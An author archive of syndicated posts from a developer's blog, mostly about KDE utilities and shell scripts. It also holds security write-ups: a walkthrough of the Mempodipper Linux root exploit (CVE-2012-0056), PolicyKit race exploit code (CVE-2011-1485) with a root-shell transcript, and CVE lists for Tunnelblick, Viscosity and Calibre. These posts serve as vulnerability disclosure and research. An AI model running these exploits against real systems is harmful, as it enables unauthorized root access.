Author Archive

Nerdling Sapple: Simple Command-line Music File Organizer

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

I’ve been using this utility since I wrote it 6 years ago, and this afternoon, I cleaned up the code base in order to release it. It’s a simple command-line music file organizer. It takes a list of files or directories as program arguments, inspects the tags of all the enclosed music files, and then determines which directories need to be created and what the music file name should be. Plenty of GUI tools do this already, many of which are very customizable, but I have yet to see a command-line utility as simple as this that gets the job done.

The general ingestion routine for acquiring music on the Interwebs is I load it up in Picard or EasyTag or another command line utility to adjust the tags, and then run:

$ organizemusic ~/Downloads/some-silly-m4a-directory

And presto, all the music is moved into the right place.

It takes care of translating difficult non ASCII character into correct transliterations using libicu and uses KDE Scott Wheeler’s taglib for the audio file tag reading.

Get it while it’s hot! You can browse the source here, look at the readme here, or clone and build it like this:

zx2c4@Dell ~ $ git clone http://git.zx2c4.com/music-file-organizer
Cloning into 'music-file-organizer'...
zx2c4@Dell ~ $ cd music-file-organizer/
zx2c4@Dell ~/music-file-organizer $ make
g++ -O3 -pipe -fomit-frame-pointer -march=native -I/usr/include/taglib    -ltag -licui18n -licuuc -licudata    readmusictags.cpp AudioFile.cpp AudioFile.h   -o readmusictags
g++ -O3 -pipe -fomit-frame-pointer -march=native -I/usr/include/taglib    -ltag -licui18n -licuuc -licudata    organizemusic.cpp AudioFile.cpp AudioFile.h   -o organizemusic

Nerdling Sapple: KRunner Dictionary Plugin: Complete

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

Over two years ago, I announced that I had written a dictionary plugin for KRunner. Many expected it would be merged immediately, but there was an unfortunate hiccup. Because of the particulars of KRunner’s threading, and the fact that the dictionary data engine needed to only be accessed from the main thread, Aaron Seigo said that he would add an AbstractRunner property called setReentrant that would allow for easily accessing data engines from the KRunner’s match thread. This never materialized. I waited, and nothing ever came, and eventually I just presumed the plasma developers weren’t interested in adding this API themselves.

Not a problem, though. Now, two years since, I’ve decided to resurrect the runner, and rewrite it using mutexes to work around the API’s threading limitations. The result turned out very cleanly, and so far in my testing it works without fail.

It’s currently in kde-review, but I’m hoping to move it into plasma-addons and ship it with 4.10, now that it works well.

For the eager, you can try it out now with these commands:

svn co svn://anonsvn.kde.org/home/kde/trunk/kdereview/plasma/runners/dictionary dictionary-krunner
cd dictionary-krunner
cmake . -DCMAKE_INSTALL_PREFIX=$(kde4-config --prefix)
make
sudo make install
kbuildsycoca4
kquitapp krunner
krunner

Nerdling Sapple: OS X Local Root Vulnerabilities via OpenVPN Clients Tunnelblick and Viscosity

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

A few weeks ago my Vaio toasted out. I’ve been using an old Dell laptop as a replacement, which was previously being used as a NAS server box. To replace the NAS, I dusted off my sister’s old Macbook and tried to wrestle OS X into shape, including writing a patch for rsync to deal with OS X’s awful UTF-8 semantics (NFC vs NFD), but this is for another post. While waiting for things to transfer, I was auditing my colo, and I typed find / -type f -perm -4000 into the Mac’s SSH session by accident. Before I could Ctrl+C out of it, I noticed “hey, weird, why’s Tunnelblick need an SUID helper?”.

Coincidentally, a friend was just touting the high quality UNIX tools OS X has to offer. I was skeptical.

It turns out that the two most popular OpenVPN client/managers for Macintosh, Viscosity and Tunnelblick, both use incredibly insecure SUID helpers.

When either Viscosity or Tunnelblick is installed, an unprivileged user can elevate permissions to become root (the Administrator user).

Here are the relevant links:

Tunnelblick Vulnerability Viscosity Vulnerability
CVE Assignment for Tunnelblick
CVE-2012-3483 1. A race condition in file permissions checking can lead to local root. – TOCTOU
CVE-2012-3484 2. Insufficient checking of merely 0:0 744 can lead to local root on systems with particular configurations.
CVE-2012-3485 3. Insufficient validation of path names can allow for arbitrary kernel module loading, which can lead to local root.
4. Insufficient validation of path names can allow execution of arbitrary scripts as root, leading to local root.
5. Insufficient path validation in errorExitIfAttackViaString can lead to deletion of files as root, leading to DoS.
CVE-2012-3486 6. Allowing OpenVPN to run with user given configurations can lead to local root.
CVE-2012-3487 7. Race condition in process killing. – TOCTOU
CVE Assignment for Viscosity
CVE-2012-4284 Insufficient validation of path names can allow execution of arbitrary python code as root, leading to local root.

Nerdling Sapple: Stripe’s Capture the Flag — Solutions

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

Stripe released a capture the flag, a security competition to exploit several contrived flaws. I solved all of them, and you can take a look at the solutions here. Here’s a video of a complete walkthrough:

Nerdling Sapple: Linux Local Privilege Escalation via SUID /proc/pid/mem Write

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that prevented write support for writing to arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels >=2.6.39 are vulnerable, up until the fix commit for it a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.

When /proc/pid/mem is opened, this kernel code is called:

static int mem_open(struct inode* inode, struct file* file)
{
	file->private_data = (void*)((long)current->self_exec_id);
	/* OK to pass negative loff_t, we can catch out-of-range */
	file->f_mode |= FMODE_UNSIGNED_OFFSET;
	return 0;
}

There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process (subject to the ordinary VFS restrictions). It simply makes note of the original process’s self_exec_id that it was opened with and stores this away for checking later during reads and writes.

Writes (and reads), however, have permissions checking restrictions. Let’s take a look at the write function:

static ssize_t mem_write(struct file * file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
 
/* unimportant code removed for blog post */	
 
	struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);
 
/* unimportant code removed for blog post */
 
	mm = check_mem_permission(task);
	copied = PTR_ERR(mm);
	if (IS_ERR(mm))
		goto out_free;
 
/* unimportant code removed for blog post */	
 
	if (file->private_data != (void *)((long)current->self_exec_id))
		goto out_mm;
 
/* unimportant code removed for blog post
 * (the function here goes onto write the buffer into the memory)
 */

So there are two relevant checks in place to prevent against unauthorized writes: check_mem_permission and self_exec_id. Let’s do the first one first and second one second.

The code of check_mem_permission simply calls into __check_mem_permission, so here’s the code of that:

static struct mm_struct *__check_mem_permission(struct task_struct *task)
{
	struct mm_struct *mm;
 
	mm = get_task_mm(task);
	if (!mm)
		return ERR_PTR(-EINVAL);
 
	/*
	 * A task can always look at itself, in case it chooses
	 * to use system calls instead of load instructions.
	 */
	if (task == current)
		return mm;
 
	/*
	 * If current is actively ptrace'ing, and would also be
	 * permitted to freshly attach with ptrace now, permit it.
	 */
	if (task_is_stopped_or_traced(task)) {
		int match;
		rcu_read_lock();
		match = (ptrace_parent(task) == current);
		rcu_read_unlock();
		if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
			return mm;
	}
 
	/*
	 * No one else is allowed.
	 */
	mmput(mm);
	return ERR_PTR(-EPERM);
}

There are two ways that the memory write is authorized. Either task == current, meaning that the process being written to is the process writing, or current (the process writing) has esoteric ptrace-level permissions to play with task (the process being written to). Maybe you think you can trick the ptrace code? It’s tempting. But I don’t know. Let’s instead figure out how we can make a process write arbitrary memory to itself, so that task == current.

Now naturally, we want to write into the memory of suid processes, since then we can get root. Take a look at this:

$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy

su will spit out whatever text you want onto stderr, prefixed by “Unknown id:”. So, we can open a fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use dup2 to couple together stderr and the mem fd, and then exec to su $shellcode to write an shell spawner to the process memory, and then we have root. Really? Not so easy.

Here the other restriction comes into play. After it passes the task == current test, it then checks to see if the current self_exec_id matches the self_exec_id that the fd was opened with. What on earth is self_exec_id? It’s only referenced a few places in the kernel. The most important one happens to be inside of exec:

void setup_new_exec(struct linux_binprm * bprm)
{
/* massive amounts of code trimmed for the purpose of this blog post */
 
	/* An exec changes our domain. We are no longer part of the thread
	   group */
 
	current->self_exec_id++;
 
	flush_signal_handlers(current, 0);
	flush_old_files(current->files);
}
EXPORT_SYMBOL(setup_new_exec);

self_exec_id is incremented each time a process execs. So in this case, it functions so that you can’t open the fd in a non-suid process, dup2, and then exec to a suid process… which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?

Here’s how to get around it. We fork a child, and inside of that child, we exec to a new process. The initial child fork has a self_exec_id equal to its parent. When we exec to a new process, self_exec_id increments by one. Meanwhile, the parent itself is busy execing to our shellcode writing su process, so its self_exec_id gets incremented to the same value. So what we do is — we make this child fork and exec to a new process, and inside of that new process, we open up a fd to /proc/parent-pid/mem using the pid of the parent process, not our own process (as was the case prior). We can open the fd like this because there is no permissions checking for a mere open. When it is opened, its self_exec_id has already incremented to the right value that the parent’s self_exec_id will be when we exec to su. So finally, we pass our opened fd from the child process back to the parent process (using some very black unix domain sockets magic), do our dup2ing, and exec into su with the shell code.

There is one remaining objection. Where do we write to? We have to lseek to the proper memory location before writing, and ASLR randomizes processes address spaces making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:

$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)

This means that su does not have a relocatable .text section (otherwise it would spit out “DYN” instead of “EXEC”). It turns out that su on the vast majority of distros is not compiled with PIE, disabling ASLR for the .text section of the binary! So we’ve chosen su wisely. The offsets in memory will always be the same. So to find the right place to write to, let’s check out the assembly surrounding the printing of the “Unknown id: blabla” error message.

It gets the error string here:

  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 (dcgettext@plt)

And then writes it to stderr:

  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 (stderr)
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 (__fprintf_chk@plt)

Closes the log:

  4036a3:       e8 f0 eb ff ff          callq  402298 (closelog@plt)

And then exits the program:

  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 (exit@plt)

We therefore want to use 0×402178, which is the exit function it calls. We can, in an exploit, automate the finding of the exit@plt symbol with a simple bash one-liner:

$ objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'
0x402178

So naturally, we want to write to 0×402178 minus the number of letters in the string “Unknown id: “, so that our shellcode is placed at exactly the right place.

The shellcode should be simple and standard. It sets the uid and gid to 0 and execs into a shell. If we want to be clever, we can reopen stderr by, prior to dup2ing the memory fd to stderr, we choose another fd to dup stderr to, and then in the shellcode, we dup2 that other fd back to stderr.

In the end, the exploit works like a charm with total reliability:

 
CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================
 
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#

You can watch a video of it in action:

As always, thanks to Dan Rosenberg for his continued advice and support. I’m currently not releasing any source code, as Linus only very recently patched it. After a responsible amount of time passes or if someone else does first, I’ll publish. If you’re a student trying to learn about things or have otherwise legitimate reasons, we can talk.

Update: evidently, based on this blog post, ironically, some other folks made exploits and published them. So, here’s mine. I wrote the shellcode for 32-bit and 64-bit by hand. Enjoy!

Update 2: as it turns out, Fedora very aptly compiles their su with PIE, which defeats this attack. They do not, unfortunately, compile all their SUID binaries with PIE, and so this attack is still possible with, for example, gpasswd. The code to do this is in the “fedora” branch of the git repository, and a video demonstration is also available.

Update 3: Gentoo is smart enough to remove read permissions on SUID binaries, making it impossible to find the exit@plt offset using objdump. I determined another way to do this, using ptrace. Ptrace allows debugging of any program in memory. For SUID programs, ptracing will drop its privileges, but that’s fine, since we simply want to find internal memory locations. By parsing the opcode of the binary at the right time, we can decipher the target address of the next call after the printing of the error message. I’ve created a standalone utility that returns the offset, as well as integrating it into the main mempodipper source.

{As always, this is work here is strictly academic, and is not intended for use beyond research and education.}

Nerdling Sapple: FOSDEM from Paris

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

I just moved to Paris, which means I’m finally in the right proximity at the right time for attending an open source conference. I’m not sure what the scoop is with the Parsian KDE community — if it exists or is vibrant, if there’s camaraderie, or what the situation is. But, in case there is a good vibe brewing inside the Paris OSS community, what do you say we all band together to attend FOSDEM. Leave our city for Brussels in a festive caravan on Friday night (or possibly just a train) and come back Sunday night? If there’s interest, email me at jason [at] zx2c4 dot com or leave a comment below.

Nerdling Sapple: KDE Doesn’t Suck Anymore, People Finally Realize

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

TechRadar has decided that KDE is the most usable desktop compared to Gnome and Unity. A few days prior to the publication of this article, my friend John emailed me to write:

I’m using Kde on my computer at work and it is amazing. It’s improved so much that it’s now stable and highly usable.

I tried Unity (I’m using Ubuntu) and it was unusable. Gnome 3 was better but had massive issues with my second screen (dual screen setup with nvdia gpu running in twin view). Gnome 3 was still lacking in the productivity area though. Lxde worked great but I don’t want to use a desktop that looks and feels like Windows 95… Also Lxde has few apps so I had to pull in gnome or ode ones…

I also had issues with Ubuntu’s lightdm but switching to kdm fixed that. So far Kde is the only desktop that fully works, feels good, looks good and has apps for every task.

John

Sent from my phone

Finally folks are figuring out that KDE doesn’t suck anymore.


Update: Adam Weiss writes with a political comparison:

Gnome 3, Unity…they are like the George W. Bush of the non-KDE Linux desktop movement. Instead of taking care of the real issues on the desk, they went gallavanting off into the netbook world, dropping bombs all over the place and even to this day nobody can really figure out what the point of netbooks is…

Nerdling Sapple: Exploit Round Up: Calibre Fiasco & LD_AUDIT

This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

A few weeks ago, I posted an exploit and a bug report for a Linux local root exploit in Calibre. The author, Kovid Goyal, became incensed, and rather than work with me to fix it, he insulted my colleagues and me. After each one of his fixes, I released a new exploit breaking the latest. It got a lot of social media hype, and was kind of a big deal. After several days of media frenzy and bad publicity, the stubborn developer finally bent to the advice of the chorus of leading security researchers, and the mount helper was removed in entirety. In any case, the exploits show some neat race condition tricks that you might want to check out, using inotify and a toggler.

  • Hilarious bug report
  • Important news article
  • Social media hype
  • More social media hype
  • Compliment from famous hacker
  • oss-security mailing list discussion
  • Obscene praise from script-kiddie
  • First Exploit
  • Second Exploit
  • Third Exploit
  • Most Glorious Forth Exploit
  • There’s plenty of technical explanation in the comments of the exploit code.

    CVE Assignment for Calibre
    CVE-2011-4124 1. Ability to create root owned directory anywhere. The mount helper calls mkdir(argv[3], …).
    2. Ability to remove any empty directory on the system.
    3. Ability to create user_controlled_dir/.created_by_calibre_mount_helper anywhere on the filesystem.
    4. Ability to delete user_controlled_dir/.created_by_calibre_mount_helper anywhere on the filesystem.
    5. Ability to inject arguments into ‘mount’ being exec’d. On lines 78, 81, and 83, the final two arguments to mount are user controlled. On lines 1033, 106, 108, 139, and 141, the last argument to unmount/eject is user controlled. The “exists()” check can be subverted via race condition or by creating an existing file in the working directory with a filename equal to the desired injected argument.
    6. Ability to unmount any device.
    CVE-2011-4125 7. Ability to execute any program as root. The mount helper makes use of execlp on lines 78, 81, 83, 103, 106, 108, 139, and 141, and the first argument does not start with a / character. Because of this, execlp will search PATH for the executable to run. PATH is user controlled, and thus it is trivial to write a program that spawns a shell and give it “mount” as a filename, and direct PATH to its directory.
    CVE-2011-4126 8. Race condition, allowing the ability to mount any device to anywhere. This leads to local root, since you can mount over /etc/ or /etc/pam.d/.

    My first three CVEs.


    After that, I decided to learn about linker bugs, so I reread Tavis’ excellent two write-ups on CVE-2010-3856 and CVE-2010-3847. I saw that there was room for writing a newer exploit based on his research that did not depend on having read access to SUID executables or having a cron daemon installed, so I wrote I Can’t Read and I Won’t Race You Either. The source has plenty of explanation. I also suggest reading Tim Brown’s excellent paper on linker bugs.

    Nerdling Sapple: Set Wallpaper from Command-line in KDE4

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    So far as I can tell, changing your wallpaper (using the default wallpaper plugin, not any fancy scripted wallpaper plugins) from the command line in KDE4 is needlessly hard. I have to write a JavaScript file to a temporary location, make a dbus call to load it into an interactive window, and then use xdotool to simulate key strokes to run it. Jimminy cricket. But below is how I have it done. If there’s an easier way that I’ve missed, pleeeaassseee let me know in the comments.

    set-wallpaper.sh:

    #!/bin/sh
    js=$(mktemp)
    cat > $js <<_EOF
    var wallpaper = "$1";
    var activity = activities()[0];
    activity.currentConfigGroup = new Array("Wallpaper", "image");
    activity.writeConfig("wallpaper", wallpaper);
    activity.writeConfig("userswallpaper", wallpaper);
    activity.reloadConfig();
    _EOF
    qdbus org.kde.plasma-desktop /App local.PlasmaApp.loadScriptInInteractiveConsole "$js" > /dev/null
    xdotool search --name "Desktop Shell Scripting Console – Plasma Desktop Shell" windowactivate key ctrl+e key ctrl+w
    rm -f "$js"

    Nerdling Sapple: Convert Office Documents to PDF with GDocs from Bash

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    I’ve figured out how to script the Google Documents Viewer into reading any office document — doc, docx, xls, xlsx, odt, ods, and probably a bunch of others — and converting it to PDF. There are tons of tools, such as unoconv, but Google’s service is well sandboxed, which makes it a nice choice if you want to convert untrusted documents, such as in the case of a web service. So without further ado, here you go:

    convert-url-to-pdf.sh:

    #!/bin/sh
     
    # by Jason A. Donenfeld
    # www.zx2c4.com
     
    if [ $# -ne 2 ]; then
            echo "Usage: $0 url output-pdf-file"
            exit 1
    fi
     
    set -e
    documenturl="$(echo -n "$1" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')"
    viewerurl="http://docs.google.com/viewer?url=$documenturl"
    pdfurl="$(printf "$(curl -s "$viewerurl" | sed -n "s/.*gpUrl:'\\([^']*\\)'.*/\\1/p" | sed 's/%/%%/g')")"
    cookiejar="$(mktemp)"
    curl -s -L -c "$cookiejar" -o "$2" $pdfurl
    rm -f "$cookiejar"

    Nerdling Sapple: Monkey Patching Ugly Ebuilds — Disabling HPLIP’s Autostart

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Gentoo’s HP printer drivers package, net-print/hplip, if you have the gui USE flags enabled, installs /etc/xdg/autostart/hplip-systray.desktop, which makes an awful Windows-like tray app load with all desktop environments for every user on the machine. Who wants this? Every user? Tray app? Autostart? This is Linux, not Windows, right?

    Upstream, i.e. Gentoo devs, doesn’t seem to want to add an autostart USE flag. I don’t feel like maintaining my own ebuild for this, either. So, the official advice is to copy hplip-systray.desktop into a special place in your own home folder, and then edit the file to have Hidden=true. Yuck. So now my start-up routine will have to spend extra CPU cycles resolving the override, not to mention the requirement for each and every user on my machine to do this. Sure I could add this extra file to the default set of files copied into each home folder on user creation for each desktop environment, but do I really want to do this? What about preexisting users? Do I really want this system installed package to require this kind of manual intervention? The obvious thing to do is just to delete /etc/xdg/autostart/hplip-systray.desktop after each time hplip installs, namely, after each update.

    But the official advice calls this approach “naive”. Fuck that. I don’t want the extra overhead of working out the collision, nor do I want to have to add this file to each user’s home folder. I want that file gone, dead, vamos‘d. The thing is, it means I have to manually remove the file after each time the ebuild gets updated (and remember, I don’t want to maintain my own fork of the ebuild).

    Fortunately, there’s a solution: Portage allows per-package environment variable overrides via /etc/portage/env/. By putting some monkey patching code in the right place, we can override a function inside of all subsequent hplip ebuilds to automagically remove the ugly file. Create the right directory:

    sudo mkdir -p /etc/portage/env/net-print

    Then, add my monkey patch code to it:

    sudo vim /etc/portage/env/net-print/hplip
    if ( ! type -t original_src_install >/dev/null) && (type -t src_install >/dev/null); then
            eval "$(echo 'original_src_install()'; declare -f src_install | tail -n +2)"
            src_install() {
                    original_src_install
                    rm -f "${D}"/etc/xdg/autostart/hplip-systray.desktop || die
            }
    fi

    Finally, re-emerge hplip, and it should install without the autostart file. Yes, this is one ugly bash-ism, but it seems to do the job. Any suggestions would be appreciated.


    Update: A reader below has noted that a far superior way of doing this is to just put

    INSTALL_MASK="/etc/xdg/autostart/hplip-systray.desktop $INSTALL_MASK"

    inside of /etc/portage/env/net-print/hplip, without needing to do the monkey patching above. INSTALL_MASK is a great feature, one that is not highlighted very much at all in the documentation. The most official mention of it I could find is in make.conf‘s man page:

           INSTALL_MASK = [space delimited list of file names]
                  Use this variable if you want  to  selectively  prevent  certain
                  files  from  being copied into your file system tree.  This does
                  not work on symlinks, but only on actual files.  Useful  if  you
                  wish  to  filter  out  files  like  HACKING.gz  and TODO.gz. The
                  INSTALL_MASK is processed just before a package is merged.  Also
                  supported  is  a  PKG_INSTALL_MASK variable that behaves exactly
                  like INSTALL_MASK except that it is processed just  before  cre‐
                  ation of a binary package.
    

    Internally in misc-functions.sh, it does essentially the same thing as my monkey patch:

    install_mask() {
    	local root="$1"
    	shift
    	local install_mask="$*"
     
    	# we don't want globbing for initial expansion, but afterwards, we do
    	local shopts=$-
    	set -o noglob
    	for no_inst in ${install_mask}; do
    		set +o noglob
    		quiet_mode || einfo "Removing ${no_inst}"
    		# normal stuff
    		rm -Rf "${root}"/${no_inst} >&/dev/null
     
    		# we also need to handle globs (*.a, *.h, etc)
    		find "${root}" \( -path "${no_inst}" -or -name "${no_inst}" \) \
    			-exec rm -fR {} \; >/dev/null 2>&1
    	done
    	# set everything back the way we found it
    	set +o noglob
    	set -${shopts}
    }

    Nerdling Sapple: PolicyKit Pwnage: linux local privilege escalation on polkit-1

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Since it’s been 6 months since reported, I figure it’s been a responsible amount of time for me to wait before releasing a local root exploit for Linux that targets polkit-1 < = 0.101, CVE-2011-1485, a race condition in PolicyKit. I present you with PolicyKit Pwnage.

    David Zeuthen of Redhat explains on the original bug report:

    Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)’ing /proc/PID. The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id. While there’s a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be – namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinking that the parent process has uid 0 and is therefore authorized. It’s pretty hard to hit this window – I actually don’t know if it can be made to work in practice.

    Well, here is, in fact, how it’s made to work in practice. There is as he said an attempted mitigation, and the way to trigger that mitigation path is something like this:

         $ sudo -u `whoami` pkexec sh
         User of caller (0) does not match our uid (1000)

    Not what we want. So the trick is to execl to a suid at just the precise moment /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed, and execl to the suid binary as our very next instruction.

    	if (fork()) {
    		int fd;
    		char pid_path[1024];
    		sprintf(pid_path, "/proc/%i", getpid());
    		printf("[+] Configuring inotify for proper pid.\n");
    		close(0); close(1); close(2);
    		fd = inotify_init();
    		if (fd < 0)
    			perror("[-] inotify_init");
    		inotify_add_watch(fd, pid_path, IN_ACCESS);
    		read(fd, NULL, 0);

    All the code up to this point makes this process block until /proc/PID is read, at which point it:

    		execl("/usr/bin/chsh", "chsh", NULL);

    Which is suid. Meanwhile in the other process, we launch pkexec, which skirts passed the initial checks, but gets fooled when we change the uid of the parent process:

    	} else {
    		sleep(1);
    		printf("[+] Launching pkexec.\n");
    		execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    	}

    And it works:

     $ pkexec --version
     pkexec version 0.101
     $ gcc polkit-pwnage.c -o pwnit
     $ ./pwnit 
     [+] Configuring inotify for proper pid.
     [+] Launching pkexec.
     sh-4.2# whoami
     root
     sh-4.2# id
     uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
     sh-4.2#

    This exploit is known to work on polkit-1 < = 0.101. However, Ubuntu, which as of writing uses 0.101, has backported 0.102's bug fix. A way to check this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or later and you're out of luck. It's likely other distributions do the same. Fortunately, this exploit is clean enough that you can try it out without too much collateral.

    So head on over and try it out! You can watch it in action over on YouTube as well:

    Greets to Dan.

    Nerdling Sapple: Work Featured in Paris Expo

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    My work for Grafitroniks was featured in an expo in Paris last week:

    Viscom 2011

    Viscom 2011

    I built the PrintCompositor.

    Nerdling Sapple: vcardexport for Meego Harmattan

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    The vcard export GUI feature of the contacts app on the N950 is broken. The console app “vcardconverter” successfully digests vcards, but you won’t be able to get them out. In my case, it converted some back to vcards, but failed on others. Unacceptable. For updating to today’s new firmware, I didn’t want to take a full backup of the tracker database, choosing instead to start fresh, suspecting that the new firmware fixes a lot of bugs. How, then, was I to backup my contacts, if I wasn’t going to backup the tracker? Vcard is the perfect neutral format for this.

    So in a few lines of easy Qt/C++, I wrote vcardexport, a console application. It spits all the contacts out into one giant vcard file that can be reimported later with vcardconverter. Simple and easy. The biggest pain was getting the Aegis manifest correct, as the auto-generation tool is broken, and documentation is kind of sparse, but it’s all sorted now.

    You can browse the source here or download the latest deb from here.

    Usage:

    $ /opt/vcardexport/bin/vcardexport > ~/vcards.vcf

    Hope this is helpful. Enjoy the new firmware:

        image        [state    progress         transfer     flash speed]
    ---------------------------------------------------------------------
    [x] cert-sw      [finished   100 %       1 /       1 kB      NA     ]
    [x] cmt-2nd      [finished   100 %      95 /      95 kB      NA     ]
    [x] cmt-algo     [finished   100 %     789 /     789 kB      NA     ]
    [x] cmt-mcusw    [finished   100 %    6008 /    6008 kB    2933 kB/s]
    [x] xloader      [finished   100 %      23 /      23 kB      NA     ]
    [x] secondary    [finished   100 %      88 /      88 kB      NA     ]
    [x] kernel       [finished   100 %    2708 /    2708 kB    2024 kB/s]
    [x] rootfs       [finished   100 %  326205 /  326205 kB    7339 kB/s]
    [x] mmc          [finished   100 %  204747 /  204747 kB   17604 kB/s]
    Updating SW release
    Success
    

    Nerdling Sapple: How many clicks ’til Philosophy?

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Ryan had a pretty funny idea I saw in his github — How many clicks does it take on Wikipedia from any given article to the article on “Philosophy”. He started to implement it by choosing the first link on each page and following that. He wrote it in node.js and jsdom. I rewrote his script (97% rewrite, according to git) to instead generate a tree structure of all the links on each page and then do a breadth first search on the tree to continually request new pages in parallel. It seems to be working amazingly well:

    $ node wiki-philosophy.js Seinfeld
    Seinfeld
            Nihilism
                    Philosophy
    
    $ node wiki-philosophy.js Superman
    Superman
            Cultural icon
                    Philosophy
    
    $ node wiki-philosophy.js Burrito
    Burrito
            Mexican cuisine
                    Tribute
                            Philosophy
    

    Play around with it! I’ve posted it with install instructions over in my git repository. Hopefully Ryan will pull back my changes into his repository and continue to develop this into something creative.

    Nerdling Sapple: Google Code Supports Git

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    It’s about time!

    Nerdling Sapple: Qt Workshop for Columbia’s Application Development Initiative

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Back in February I gave a workshop seminar on the basics of Qt — covering signals, slots, the metaobject system, QtGui, QtWebkit, and Qt Creator. We all built a fully functional web browser together, over the course of about an hour. The entirety was spoken just off the top of my head, so it might be slightly disorganized, but there was pretty high reception from it. I know that following the presentation, at least two people went on to use Qt for major projects. Here’s the presentation:


    Direct YouTube Link

    Unfortunately, the projector in the room was broken, so we all had to huddle around my laptop, which actually had the effect of making the workshop much more intimate. If you’re interested, here’s the code we wrote together.

    Nerdling Sapple: Wanted: Nokia E52-2

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    The Nokia E52 is the most awesome phone ever made. It has a normal T9 keypad, GPS, 3G, Wifi, and runs Symbian. These are the features I need. Sure Android and others are more modern operating systems, but there is no smartphone OS that has phones with T9 hardware keypads of this form factor, except for the E52. There is one problem: it’s not made anymore

    There are two models of the E52 — the E52-1, which has European 3G frequencies, and the E52-2, which has North American 3G frequencies. I’m looking for the E52-2.

    If anyone knows there whereabouts of an E52-2, please inform me. I will bid high.

    Nerdling Sapple: Luddite Seeks Futuristic Phone

    This post was syndicated from: Nerdling Sapple and was written by: Jason Donenfeld. Original post: at Nerdling Sapple

    Congratulations to the neccesitas project for joining KDE. I’m not sure what this means as far as KDE’s orientation or how this reflects the latest attitude of, “shit! we spent all this time fussing over Nokia’s mobile hype, and now we realize the desktop is rotting and we need to save it,” but it’s nonetheless exciting to know that neccesitas is supported by a good organization.

